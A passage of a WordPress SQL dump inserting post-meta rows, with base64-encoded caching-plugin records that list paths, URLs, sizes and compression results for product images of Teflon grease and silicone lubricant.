dmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NjgwLCJpZCI6MTQ3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg2ODMsImlkIjoxNDcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4Njg1LCJpZCI6MTQ3MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODY4OCwiaWQiOjE0NzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg2OTEsImlkIjoxNDcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NjkzLCJpZCI6MTQ3MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODY5NiwiaWQiOjE0NzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg2OTksImlkIjoxNDcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NzAxLCJpZCI6MTQ3MX1d'); 
INSERT INTO `wp_postmeta` VALUES (29416, 1469, 'wpfc_optimisation_reduction', '1946761'); 
INSERT INTO `wp_postmeta` VALUES (29417, 1469, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQuanBnIiwicmVkdWN0aW9uIjoxOTQ2NzQ2LCJ0aW1lIjoxNDgzNTY4NzEzLCJpZCI6IjE0NjkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODcxNiwiaWQiOjE0Njl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NzIwLCJpZCI6MTQ2OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg3MjMsImlkIjoxNDY5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NzI3LCJpZCI6MTQ2OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg3MjksImlkIjoxNDY5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODczMiwiaWQiOjE0Njl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NzM1LCJpZCI6MTQ2OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg3MzgsImlkIjoxNDY5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NzQwLCJpZCI6MTQ2OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODc0MywiaWQiOjE0Njl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg3NDUsImlkIjoxNDY5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NzQ4LCJpZCI6MTQ2OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODc1MSwiaWQiOjE0Njl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg3NTMsImlkIjoxNDY5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNpbGljb25lLWx1YnJpY2FudC1xdWFydC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zaWxpY29uZS1sdWJyaWNhbnQtcXVhcnQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2lsaWNvbmUtbHVicmljYW50LXF1YXJ0LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NzU2LCJpZCI6MTQ2OX1d'); 
INSERT INTO `wp_postmeta` VALUES (29418, 1468, 'wpfc_optimisation_reduction', '2397370'); 
